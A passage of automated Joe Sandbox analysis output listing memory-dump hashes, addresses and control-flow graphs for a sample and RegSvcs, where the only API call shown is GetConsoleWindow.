                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 538f07338a10e8ed9bf7cf8a36b0484787d300bae17b1731bf542d1880c294a5
                                                                                                                                                    • Instruction ID: 9e05191b6b5a2777c38573dec2d8ac0c74cff4118d5e4ba201ab97299831541f
                                                                                                                                                    • Opcode Fuzzy Hash: 538f07338a10e8ed9bf7cf8a36b0484787d300bae17b1731bf542d1880c294a5
                                                                                                                                                    • Instruction Fuzzy Hash: 5CE11774E001198FCB54DFA9C5809AEFBB6FF89340F24D16AE515AB31AD731A941CFA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 66645fa548012d8e02d603e56836296759eae270fc41df3ee795a93bd8a925c0
                                                                                                                                                    • Instruction ID: bf93693187bb8de6ddfe98c56f6680a677d5f8654e951ea926cc9ea3c551863d
                                                                                                                                                    • Opcode Fuzzy Hash: 66645fa548012d8e02d603e56836296759eae270fc41df3ee795a93bd8a925c0
                                                                                                                                                    • Instruction Fuzzy Hash: 57E1E874E001198FDB14DFA9C5809AEFBF6FF89304F249169E518AB35AD731A941CFA0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 94179108ef0a36c07cdaec5e2a9880370134bc54383aa9e487bd257eb91e1ae4
                                                                                                                                                    • Instruction ID: de786928de41d8e97411607a90f035bd9d9a83b2a4f654a6a894927a9c0feadf
                                                                                                                                                    • Opcode Fuzzy Hash: 94179108ef0a36c07cdaec5e2a9880370134bc54383aa9e487bd257eb91e1ae4
                                                                                                                                                    • Instruction Fuzzy Hash: 8BD1F43591065A8ECB11EFA4D990B99F771EF95300F50C79AE40977224EB70AAC9CF90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b2dcbecd9a2b76be032a82ae2ffd0732f5c5bbc0d6996eaabdc82cfa337957ca
                                                                                                                                                    • Instruction ID: b597488abd122ba41d3f09f3404c8ed32d371457569fea46b0422a9fc2df3675
                                                                                                                                                    • Opcode Fuzzy Hash: b2dcbecd9a2b76be032a82ae2ffd0732f5c5bbc0d6996eaabdc82cfa337957ca
                                                                                                                                                    • Instruction Fuzzy Hash: D8D1D43591065A8ECB11EFA4D990B99F771EF95300F50C79AE40977224EB70AAC9CF90
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1838113803.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6b0000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8e98c31792d5f4fad77aafa2aba6f88d703935994a5569cf19110e9298ceefc6
                                                                                                                                                    • Instruction ID: 55b57607f3fe3fcd4ceac8fcb9eff27b5d7d93706f03784b573b1176b1616279
                                                                                                                                                    • Opcode Fuzzy Hash: 8e98c31792d5f4fad77aafa2aba6f88d703935994a5569cf19110e9298ceefc6
                                                                                                                                                    • Instruction Fuzzy Hash: 92A14A72A002198FCF15DFA4C8509EEB7B2FF84300B15857AE905AB276DB75E986CB40
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9ed3266a7d6df353ed44072262c2433c02ba29c571829460643af5838f8c2c7a
                                                                                                                                                    • Instruction ID: 025010840025b145cb1840107c4dea6e1bac1399c1c4da7d5a7c998bb31faaa4
                                                                                                                                                    • Opcode Fuzzy Hash: 9ed3266a7d6df353ed44072262c2433c02ba29c571829460643af5838f8c2c7a
                                                                                                                                                    • Instruction Fuzzy Hash: 17C107B0902F468FD711CF65ED881A93BB1BB85324B558309D3626B2F5DBBC148ACF58

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:15%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                    Total number of Nodes:22
                                                                                                                                                    Total number of Limit Nodes:1
                                                                                                                                                    execution_graph 12313 ca0871 12318 ca08c8 12313->12318 12323 ca0817 12313->12323 12329 ca08d8 12313->12329 12314 ca0889 12319 ca08d8 12318->12319 12334 ca0ce8 12319->12334 12338 ca0ce5 12319->12338 12320 ca093e 12320->12314 12324 ca081d 12323->12324 12325 ca0897 12324->12325 12327 ca0ce8 GetConsoleWindow 12324->12327 12328 ca0ce5 GetConsoleWindow 12324->12328 12325->12314 12326 ca093e 12326->12314 12327->12326 12328->12326 12330 ca08fa 12329->12330 12332 ca0ce8 GetConsoleWindow 12330->12332 12333 ca0ce5 GetConsoleWindow 12330->12333 12331 ca093e 12331->12314 12332->12331 12333->12331 12335 ca0d26 GetConsoleWindow 12334->12335 12337 ca0d56 12335->12337 12337->12320 12339 ca0ce8 GetConsoleWindow 12338->12339 12341 ca0d56 12339->12341 12341->12320

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 861 ca0ce5-ca0d54 GetConsoleWindow 865 ca0d5d-ca0d82 861->865 866 ca0d56-ca0d5c 861->866 866->865
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992405338.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_ca0000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2863861424-0
                                                                                                                                                    • Opcode ID: 1cefa301690dfb8a3a6036a2409a5cbb81f13afb56df9e40fcce1aa92b63e275
                                                                                                                                                    • Instruction ID: 62f964f1ab4fcebeb1b2421d3330ce3215befb2301703cda33edb6493db317fa
                                                                                                                                                    • Opcode Fuzzy Hash: 1cefa301690dfb8a3a6036a2409a5cbb81f13afb56df9e40fcce1aa92b63e275
                                                                                                                                                    • Instruction Fuzzy Hash: 001125B1D002598FCB20DFAAD5457DEBBF4AB88324F20882AD459A7250CB75A944CBA4

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 870 ca0ce8-ca0d54 GetConsoleWindow 873 ca0d5d-ca0d82 870->873 874 ca0d56-ca0d5c 870->874 874->873
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992405338.0000000000CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_ca0000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2863861424-0
                                                                                                                                                    • Opcode ID: 6f71691bf841796f3f4fdf8e22655f15af4f7df95c3c87b7462be6bf3133685b
                                                                                                                                                    • Instruction ID: 9baa10fc6379a80a0d380c29718440c303648d776325f33185f59d42ed2eadd3
                                                                                                                                                    • Opcode Fuzzy Hash: 6f71691bf841796f3f4fdf8e22655f15af4f7df95c3c87b7462be6bf3133685b
                                                                                                                                                    • Instruction Fuzzy Hash: 121136B1D003498FCB20DFAAD5457DEFBF4AB48324F208419C459A7250CB75A544CFA4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3c404f01f326dbe6321b4e8d61c549b9cdad764de793097ad497f41fcaaeb79a
                                                                                                                                                    • Instruction ID: 2ff087ba3f05ef75bcd2ca72e32987e936a19f86a24be43d1463bf08cabd4012
                                                                                                                                                    • Opcode Fuzzy Hash: 3c404f01f326dbe6321b4e8d61c549b9cdad764de793097ad497f41fcaaeb79a
                                                                                                                                                    • Instruction Fuzzy Hash: 92210671500240DFCB15EF14D9C0B2ABFA5FB88324F24C269ED0A0B256C336D856DBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: dffd759ad963ec5f9d95f98c2ac0fcc2fb9b4b955d9bc5e8fbf023f4dae461e0
                                                                                                                                                    • Instruction ID: e79ea623b4f7148b390f32765ab09cf8e82d2cab2c992a65a81e2efeccc7360e
                                                                                                                                                    • Opcode Fuzzy Hash: dffd759ad963ec5f9d95f98c2ac0fcc2fb9b4b955d9bc5e8fbf023f4dae461e0
                                                                                                                                                    • Instruction Fuzzy Hash: E82167B1504204DFCB04EF14D9C0B6BBF65FB98324F20C9ADE80A0B256C336D856C7A1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: eac852a8b68c207f0d0e4f4dfcce6207da573e4356775ee034fa008df2bbab49
                                                                                                                                                    • Instruction ID: b481f37e76c5fd847c19c1be1e8e9153c2e6676b60b6fe25a42dd7ecc12b3f96
                                                                                                                                                    • Opcode Fuzzy Hash: eac852a8b68c207f0d0e4f4dfcce6207da573e4356775ee034fa008df2bbab49
                                                                                                                                                    • Instruction Fuzzy Hash: E3213879504300DFDB20DF14D9C4B2ABB75FB84325F24C569DC4A4B266C33AD88ACAA6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2f8158839e965af9c1ce22d2a3f34d865e8c7f0313d7a322200fe8412f3b7e75
                                                                                                                                                    • Instruction ID: 5cc6775f15b0f52b4257eb2eb2f14b3d1269ff03d050e83ce091cb35736034d9
                                                                                                                                                    • Opcode Fuzzy Hash: 2f8158839e965af9c1ce22d2a3f34d865e8c7f0313d7a322200fe8412f3b7e75
                                                                                                                                                    • Instruction Fuzzy Hash: 2421F5B9504300DFCB14DF14D5C4B26BB65FB84319F60C569DC4B4B256C336D88ACA66
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                    • Instruction ID: a267ee0f2395b085c19ee741e9be92ac362f5b2c7c768fb07837a79a402943e7
                                                                                                                                                    • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                                                                                    • Instruction Fuzzy Hash: 7521CD72504280DFCB06DF00D9C4B1ABF72FB88324F24C2A9DD490A656C33AD926CB91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction ID: 2847d8c179b4f660ab642e9dcc27f9fe99ca204bdb313f96c4d84ec8b85e354f
                                                                                                                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                    • Instruction Fuzzy Hash: 2911E676504244CFCB06DF10D5C4B56BF72FB94314F25C6AAEC490B256C336D95ACBA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction ID: 42c24f790fcba2144c51390758246cb9a731a12c3890d951334e53938b8fc9b9
                                                                                                                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                    • Instruction Fuzzy Hash: A711BBB9504380CFCB11CF10C5C4B15BBA1FB88319F24C6AADC4A4B256C33AD94ACB62
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992241583.0000000000C5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C5D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c5d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                    • Instruction ID: 2bee2cc879d12ed352273f2f04215cf96d3ff95f2f527cf60e937e1fbfae2529
                                                                                                                                                    • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                    • Instruction Fuzzy Hash: AB11907A504280CFDB11CF14D5C4B19BB71FB84324F24C6AADC494B656C33AD94ACBA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 101b20ea305ce4c830c2d30a8b6d98cb071dae1c4e559d3b128a9ede2150c0aa
                                                                                                                                                    • Instruction ID: 3ce181c5061f768c233ca9816205d5a96b080a826be044d6acb9b29970018232
                                                                                                                                                    • Opcode Fuzzy Hash: 101b20ea305ce4c830c2d30a8b6d98cb071dae1c4e559d3b128a9ede2150c0aa
                                                                                                                                                    • Instruction Fuzzy Hash: A001263100C3409AE710AF2ADDC4B67FFE8FF51320F18C46AED1A0A286C679D840D672
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000003.00000002.1992203069.0000000000C4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C4D000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_3_2_c4d000_RegSvcs.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7904fbfbb8e2757f7ab3252827f2342bd26654938f3e1cb840d78f1ad8da2090
                                                                                                                                                    • Instruction ID: 153c15d28c2a491fa5494e3e4d28ed4aa3b1aa2cec7ead1c312f21b1cf5b70e4
                                                                                                                                                    • Opcode Fuzzy Hash: 7904fbfbb8e2757f7ab3252827f2342bd26654938f3e1cb840d78f1ad8da2090
                                                                                                                                                    • Instruction Fuzzy Hash: 4DF0CD71008340AEEB108E1AD8C8B62FFE8FB51334F18C45AED090B286C2799840CAB1